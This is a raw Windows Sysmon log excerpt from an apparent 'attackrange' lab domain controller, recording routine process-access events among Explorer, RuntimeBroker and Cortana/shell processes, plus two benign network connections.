12:02:30.122{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006482Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.122{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006481Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.122{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006480Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.122{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000006479Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.122{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 354300x80000000000000006478Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.466{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53584-false52.250.195.204-443https 354300x80000000000000006477Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.839{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local58262- 10341000x80000000000000007280Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007279Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007278Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007277Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007276Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49245960C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007275Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49244776C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.onecore.dll+1717e|C:\Windows\system32\windows.cortana.onecore.dll+15fb7|C:\Windows\system32\windows.cortana.onecore.dll+16127|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506 10341000x80000000000000007274Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49245960C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007273Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245864C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007272Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245864C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007271Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007270Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245480C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007269Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007268Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246036C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007267Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246036C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007266Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245864C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007265Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
